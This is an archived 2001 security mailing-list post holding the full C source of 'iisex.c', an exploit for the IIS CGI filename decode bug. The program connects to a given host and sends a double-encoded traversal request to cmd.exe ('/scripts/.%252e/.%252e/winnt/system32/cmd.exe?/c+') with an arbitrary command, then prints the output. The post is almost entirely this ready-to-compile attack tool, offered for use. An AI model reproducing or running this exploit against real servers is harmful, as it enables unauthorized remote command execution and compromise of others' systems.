iis exploit (fixed)

• Previous message: Marc Maiffret: "iPlanet - Netscape Enterprise Web Publisher Buffer Overflow"
• Reply: A.Ramos: "Re: iis exploit (fixed)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This is the fixed iis exploit

^^^--------- iisex.c starts here-------^^^^

/*  IISEX by HuXfLuX <huxflux2001at_private>. IIS CGI File Decode Bug 
exploit. Written 16-05-2001.
    Compiles on Linux, works with IIS versions 3, 4 and 5. Microsoft's 
products were always
    famous for their backward compatibility!

    You can change the SHOWSEQUENCE value to some other strings that also 
work.
    More info: http://www.nsfocus.com

    Thanx to Filip Maertens <filipat_private>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netdb.h>
#include <arpa/inet.h>

#define SHOWSEQUENCE "/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"

int resolv(char *hostname,struct in_addr *addr);

int main(int argc, char *argv[])
{

        struct sockaddr_in sin;
        struct in_addr victim;
        char recvbuffer[1], stuff[200]="";
        int create_socket;

        printf("IISEX by HuxFlux <huxflux2001at_private>\nThis exploits 
the IIS CGI Filename Decode Error.\nWorks with IIS versions 3, 4 and 
5!.\n");

        if (argc < 3)
        {
                printf("[?] Usage: %s [ip] [command]\n", argv[0]);
                exit(0);
        }

        if (!resolv(argv[1],&victim))
        {
                printf("[x] Error resolving host.\n");
                exit(-1);
        }
        printf("\n[S] Exploit procedure beginning.\n");

        if (( create_socket = socket(AF_INET,SOCK_STREAM,0)) > 0 ) 
printf("[*] Socket created.\n");

        bzero(&sin,sizeof(sin));
        memcpy(&sin.sin_addr,&victim,sizeof(struct in_addr));
        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        //sin.sin_addr.s_addr = inet_addr(argv[1]);


        if (connect(create_socket, (struct sockaddr *)&sin,sizeof(sin))==0) 
printf("[*] Connection made.\n");
        else {
                printf("[x] No connection.\n");
                exit(1);
        }

        strcat(stuff, "GET ");
        strcat(stuff, SHOWSEQUENCE);
        strcat(stuff, argv[2]);
        strcat(stuff, " HTTP/1.0\r\n\r\n");
        printf("[*] Sending: %s", stuff);

        memset(recvbuffer, '\0',sizeof(recvbuffer));

        send(create_socket, stuff, sizeof(stuff), 0);

        if ( strstr(recvbuffer,"404") == NULL ) {
                printf("[*] Command output:\n\n");

                while(recv(create_socket, recvbuffer, 1, 0) > 0)
                {
                        printf("%c", recvbuffer[0]);
                }
                printf("\n\n");
        }
        else printf("[x] Wrong command processing. \n");
        printf("[E] Finished.\n");

        close(create_socket);
}

int resolv(char *hostname,struct in_addr *addr)
{
        struct hostent *res;

        if (inet_aton(hostname,addr)) return(1);

        res = gethostbyname(hostname);
        if (res == NULL) return(0);

        memcpy((char *)addr,(char *)res->h_addr,sizeof(struct in_addr));
        return(1);
}
^^^--------- iisex.c ends here-------^^^^
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

• Next message: Linux Mandrake Security Team: "MDKSA-2001:047-1 - pine update"
• Previous message: Marc Maiffret: "iPlanet - Netscape Enterprise Web Publisher Buffer Overflow"
• Reply: A.Ramos: "Re: iis exploit (fixed)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed May 16 2001 - 02:49:11 PDT